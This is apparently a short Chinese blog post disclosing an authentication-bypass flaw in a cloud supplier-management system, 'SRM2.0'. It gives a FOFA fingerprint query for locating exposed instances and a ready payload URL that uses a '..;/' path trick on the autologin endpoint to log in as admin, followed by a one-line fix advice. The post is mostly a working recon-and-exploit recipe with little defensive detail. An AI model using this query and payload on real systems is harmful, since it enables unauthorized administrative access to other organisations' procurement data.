某云彩SRM2.0后台绕过漏洞

文章目录

免责申明

本文章仅供学习与交流,请勿用于非法用途,均由使用者本人负责,文章作者不为此承担任何责任

搜索语法

fofa

复制代码
icon_hash="1665918155"

漏洞描述

某云采 SRM2.0是一款先进的供应链管理系统,旨在优化企业的采购流程和供应商管理。该系统通过云端技术,提供实时的数据分析和智能决策支持,帮助企业提高采购效率和降低成本。

该系统在autologin接口处存在权限绕过漏洞

漏洞复现

payload

复制代码
http://ip/adpweb/static/..;/api/sys/app/autologin?loginName=admin 

修复建议

更新到最新版本

相关推荐
kp000001 小时前
PHP弱类型安全漏洞解析与防范指南
android·开发语言·安全·web安全·php·漏洞
智云软件测评服务3 天前
系统漏洞扫描服务:维护网络安全的关键与服务原理?
漏洞·扫描·潜在
智云软件测评服务12 天前
主机漏洞扫描:如何保障网络安全及扫描原理与类型介绍?
漏洞·主机·扫描
智云软件测评服务13 天前
数字化时代下,软件测试中的渗透测试是如何保障安全的?
渗透·测试·漏洞
ybdesire1 个月前
Jinja2模板引擎SSTI漏洞
网络·人工智能·安全·web安全·大模型·漏洞·大模型安全
网络研究院1 个月前
2025 年 4 月补丁星期二预测:微软将推出更多 AI 安全功能
人工智能·安全·microsoft·漏洞·威胁·补丁
漫步企鹅2 个月前
【漏洞修复】为了修复ARM64 Android10系统的第三方库漏洞,将ARM64 Android16的系统库直接拷贝到Android10系统如何?
android·漏洞·修复·系统库
与神明画鸭2 个月前
常见框架漏洞:Thinkphp(TP)篇
漏洞·thinkphp·tp
晓翔仔2 个月前
利用 requestrepo 工具验证 XML外部实体注入漏洞
xml·网络安全·信息安全·渗透测试·漏洞
渗透测试老鸟-九青3 个月前
基于Electron的应用程序安全测试基础 — 提取和分析.asar文件的案例研究
网络·数据仓库·hive·hadoop·安全·网络安全·漏洞